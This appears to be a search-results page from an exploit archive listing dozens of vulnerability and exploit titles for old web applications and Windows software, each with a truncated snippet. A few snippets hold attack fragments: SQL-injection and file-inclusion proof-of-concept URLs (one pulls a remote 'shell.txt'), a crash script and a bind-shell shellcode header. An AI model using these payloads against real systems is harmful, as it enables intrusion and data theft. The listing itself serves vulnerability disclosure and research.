56796 matches found
Alpin CMS 1.0 - SQL Injection Vulnerability
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= L0v3 To: R00T, R45c4l, Agent: 1c3c0ld, Big Kid, Luckywww.indishell.in -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=...
ColdBookmarks 1.22 SQL Injection Vulnerability
No description provided by source. ColdGen - coldbookmarks v1.22 Remote 0day SQL Injection vulnerability Vendor: http://www.coldgen.com/ Found by: mrme net-ninja.net PoC http://target/path/index.cfm?fuseaction=EditBookmark&BookmarkID=SQLi&CFID=XXXXXX&CFTOKEN=XXXXXXXX...
xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability
No description provided by source...
Joomla Component MS Comment 0.8.0b - LFI Vulnerability
No description provided by source...
GhostScript PostScript File Stack Overflow Exploit
No description provided by source. Check Point Software Technologies - Vulnerability Discovery Team VDT Rodrigo Rubira Branco - rbranco noSPAM checkpoint.com GhostScript Stack Overflow bsd/x86/shellbindtcp - 214 bytes http://www.metasploit.com Encoder: x86/alphaupper AppendExit=false,...
xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection "reviews.php"
No description provided by source. / / / / / / / / / / // / / / / ///// // Exploit Title: xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection reviews.php Date: 2010-09-18 Author: secret Contact : [email protected] / ICQ : 17-33-77 Site : swissfaking.net/board Software Link:...
WaveMax Sound Editor 4.5.1 - Denial of Service PoC
No description provided by source. Exploit Title: WaveMax Sound Editor 4.5.1 Local Crash PoC Software Link: http://www.wave-max.com/wavemax/ Tested on: Win XP SP3 Date: 04-12-2010 Author: h1ch4m Email: [email protected] my $file= 1.cda; my $junk = \x41 x 1000; open$FILE,$file; print $FILE $junk;...
G Data TotalCare 2011 0day Local Kernel Exploit
No description provided by source. / Exploit Title: G Data TotalCare 2011 0day Local Kernel Exploit Date: 2010-11-08 Author: Nikita Tarakanov CISS Research Team Software Link: http://www.gdata.de/ Version: up to date, version 21.1.0.5, MiniIcpt.sys version 1.0.8.9 Tested on: Win XP SP3 CVE :...
Comcast DOCSIS 3.0 Business Gateways Multiple Vulnerabilities
No description provided by source. Trustwave's SpiderLabs Security Advisory TWSL2011-002: Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways D3G-CCR https://www.trustwave.com/spiderlabs/advisories/TWSL2011-002.txt Published: 2011-02-04 Version: 1.0 Vendor: Comcast http://comcast.com Product:...
YaPig 0.94.0u - Remote File Inclusion Vulnerability
No description provided by source. |=-----------------------------------------------------=| |=-------------= JIKO |No-exploit.Com| =-----------=| |=-----------------------------------------------------=| -----------|00| NAme :JIKO JAWAD Home :No-exploit.Com Mail : !x! -----------|01| -Script nam...
BES-CMS 0.4/0.5 message.php File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The...
Joomla Component com_perchagallery SQL Injection Vulnerability
No description provided by source. Joomla Component comperchagallery SQL Injection Vulnerability Author :FL0RiX Name : comperchagallery Bug Type : SQL Injection Infection : Admin login bilgileri alinabilir. Demo Vuln : http://localhost/index.php?option=comperchagallery&view=editunidad&id=EXPLOIT...
Word Splash Pro <= 9.5 - Buffer Overflow
No description provided by source. Exploit Title: Word Splash Pro = 9.5 Buffer Overflow -EggHunter- Software Link: http://www.chronasoft.com/software/wordsplashpro Version: = 9.5 Tested on: Win XP SP3 French Date: 20/12/2010 Author: h1ch4m Email: [email protected] Home: Net-Effects.blogspot.com Gree...
FreezingCold Broadboard search.asp SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/11250/info Reportedly BroadBoard Message Board is affected by multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied URI input prior to using it in ...
Altarsoft Audio Converter 1.1 - Buffer Overflow Exploit (SEH)
No description provided by source. Exploit Title: Exploit Buffer Overflow Altarsoft Audio Converter 1.1SEH Date: 16/12/2010 Author: C4SS!0 G0M3S Software Link: http://www.altarsoft.com/downloads/AltarsoftAudioConverter.exe Version: 111 Tested on: WIN-XP SP3 PT-BR CVE: N/A Created By C4SS!0 G0M3S...
Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption
No description provided by source. $Id: ms09043owcmsdso.rb 9893 2010-07-20 23:28:47Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of...
DomPHP <= v0.83 - Local Directory Traversal Vulnerability
No description provided by source. ------------------------------------------------------------- DomPHP = v0.83 Local Directory Traversal Vulnerability ------------------------------------------------------------- = Author : Houssamix = Script : DomPHP = v0.83 = Download :...
Entertainment Directory <= 1.1 - SQL Injection Vulnerability
No description provided by source. --==+================================================================================+==-- --==+ Entertainment Directory = 1.1 SQL Injection Vulnerbility +==-- --==+================================================================================+==-- Discovered...
Joomla Component com_extplorer <= 2.0.0 RC2 Local Directory Traversal
No description provided by source. -------------------------------------------------------------------------------------------------------------- ----- H-T Team HouSSaMix + ToXiC350 from MoroCCo ---------------------------------------------------------...
phpDatingClub 3.7 - Remote SQL/XSS Injection Vulnerabilities
No description provided by source. phpDatingClub v 3.7ansubdepartmentsid SQL/XSS Injection Vulnerability Note: Algeria 2-0 Zambia Founder : ThE g0bL!N Home:WwW.Snakespc.CoM More info:http://www.w2b.ru/webapp.php?cat=phpDatingClub SQL Injection Vulnerability Exploit...
WordPress Plugin My Category Order <= 2.8 - SQL Injection Vulnerability
No description provided by source. Source: WordPress Plugin: My Category Order = 2.8 mycategoryorder.php / SQL Injection Vulnerability Download: http://wordpress.org/extend/plugins/my-category-order/ No Dork Author: ManhLuat93 at hcegroupdotnet Errors appears only when you have admin control Open...
WordPress IP-Logger Plugin <= 3.0 - SQL Injection Vulnerability
No description provided by source. Exploit Title: WordPress IP-Logger plugin = 3.0 SQL Injection Vulnerability Date: 2011-08-16 Author: Miroslav Stampar miroslav.stamparatgmail.com @stamparm Software Link: http://downloads.wordpress.org/plugin/ip-logger.3.0.zip Version: 3.0 tested --- PoC ---...
Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/10122/info Microsoft Windows Local Descriptor Table programming interface is prone to a privilege-escalation vulnerability. A local attacker may be able to create a malicious entry in the Local Descriptor Table. This entr...
Maian Uploader 4.0 - Shell Upload Vulnerability
No description provided by source...
Softerra PHP Developer Library <= 1.5.3 File Include Vulnerabilities
No description provided by source. Softerra. PHP Developer Library Class: Remote File Include Vulnerability Patch: Unavailable Published 2006/10/12 Remote: Yes Local: No Type: High Site: http://www.softerra.com/productsphp-library.htm Author: MP Contact: [email protected] Exploit:...
Filezilla FTP Server <= 0.9.21 (LIST/NLST) Denial of Service Exploit
No description provided by source. ?php Filezilla FTP Server 0.9.20 beta / 0.9.21 LIST, NLST and NLST -al Denial Of Service by shinnai mail: shinnaiatautisticidotorg site: http://shinnai.altervista.org special thanks to rgod for his first advisory about STOR Denial of service, see:...
Joomla Component News Portal com_news Local File Inclusion Vulnerability
No description provided by source. ================================================================================================================= o Joomla Component News Portal Local File Inclusion Vulnerability Software : comnewsportal version 1.5.x Vendor : http://www.ijoomla.com/ Author :...
Sysax <= 5.62 Admin Interface Local Buffer Overflow
No description provided by source. !/usr/bin/python Title: Sysax = 5.62 Admin Interface Local Buffer Overflow Author: Craig Freyman @cd1zz Tested on: XP SP3 32bit Date Discovered: June 15, 2012 Vendor Contacted: June 19, 2012 Details:...
cpcommerce 1.1.0 (xss/lfi) Multiple Vulnerabilities
No description provided by source. www.BugReport.ir AmnPardaz Security Research Team Title: cpCommerce Multiple Vulnerabilities Vendor: http://cpcommerce.cpradio.org Bugs: XSS, SQL Injection , Local File Inclusion Vulnerable Version: 1.1.0 prior versions also may be affected Exploitation: Remote...
PayProCart <= 1146078425 Multiple Remote File Include Vulnerabilities
No description provided by source. google dork :powered by: profitCode exploite: http://url/index.php?proMod=http://shell.txt? discoverde by momo26 ;!!!!!!!!!!!!!!! +-------------------------------------------------------------------- + + ppalCart V2.5 EE Remote File Inclusion +...
CyberBrau <= 0.9.4 (forum/track.php) Remote File Include Vulnerability
No description provided by source. --------------------------------------------------------------------------- CyberBrau = 0.9.4 path Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team :...
Crystal Report Viewer 8.0.0.371 - ActiveX Denial of Service Vulnerability
No description provided by source. html Crystal Reporting Viewer v8.0.0.371 Author: Matthew Bergin Website: www.berginpentesting.com Website: www.smashthestack.org object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='target' /object script language='vbscript' targetFile =...
PHP 4.x PHPInfo Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/15248/info PHP is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script cod...
Adobe Acrobat <= 9.1.3 - Stack Exhaustion Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/35148/info Adobe Acrobat is prone to a denial-of-service vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to cause the affected application to cras...
Barracuda Spam Firewall 3.3.x preview_email.cgi file Parameter Arbitrary File Access
No description provided by source. source: http://www.securityfocus.com/bid/19276/info Spam Firewall is prone to multiple vulnerabilities, including a directory-traversal issue, access-validation issue, and a remote command-execution issue. A remote attacker can exploit these issues to gain acces...
osCommerce 2.2/3.0 'oscid' Session Fixation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/34348/info osCommerce is prone to a session-fixation vulnerability. Attackers can exploit this issue to hijack a user's session and gain unauthorized access to the affected application. The following are vulnerable:...
MacOS X 10.1.x SoftwareUpdate Arbitrary Package Installation Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/5176/info A vulnerability has been reported for MacOS X where an attacker may use SoftwareUpdate to install malicious software on the vulnerable system. SoftwareUpdate uses HTTP, without any authentication, to obtain...
AIOCP 1.3.x cp_forum_view.php choosed_language Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/20931/info All In One Control Panel AIOCP is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied input data. Exploiting these issues could allow an attacker to steal...
NotSopureEdit <= 1.4.1 - Remote File Include Vulnerability
No description provided by source. ======================================================== NotSopureEdit = 1.4.1 Remote File Include Vulnerability ======================================================== + NotSopureEdit = 1.4.1 Remote File Include Vulnerability...
CubeCart 3.0.x view_doc.php view_doc Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/20215/info CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied...
Mobilelib Gold Multiple Cross-Site Scripting Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/21817/info Mobilelib GOLD is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script co...
Clickbank Portal 'search.php' Cross Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/31438/info Clickbank Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browse...
netkar-PRO 1.1 - Remote Stack Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/39555/info netkar-PRO is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check messages before copying them to an insufficiently sized memory buffer. Successful exploits can...
Cline Communications Multiple SQL Injection Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/18491/info Cline Communications is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL queries. A successfu...
Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...
ActiveKB NX 2.6 Index.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/26027/info ActiveKB NX is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an...
Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities
No description provided by source. Document Title: =============== Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1165 Release Date: ============= 2013-12-09 Vulnerability Laboratory ID VL-ID:...
InternetNow ProxyNow 2.6/2.75 Multiple Stack and Heap Overflow Vulnerabilities
No description provided by source. source: http://www.securityfocus.com/bid/9500/info ProxyNow has been reported to be prone to multiple overflow vulnerabilities that may allow an attacker to execute arbitrary code in order to gain unauthorized access to a vulnerable system. The vulnerabilities...
Nullsoft Winamp <= 5.3 (Ultravox-Max-Msg) Heap Overflow DoS PoC
No description provided by source. / Nullsoft Winamp 5.31 Ultravox Ultravox-Max-Msg Heap Overflow Dos POC by cocoruderfrankruderathotmail.com,2006/10/30 use like winampunsv.exe ultravox-max-msgvalue,then the winampunsvsimple ultravox server will listen on tcp port 80,when winamp connect the serve...
bloofoxCMS 0.3.5 'search' Parameter Cross Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/36700/info bloofoxCMS is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input passed through the 'search' parameter. An attacker may leverage this issue ...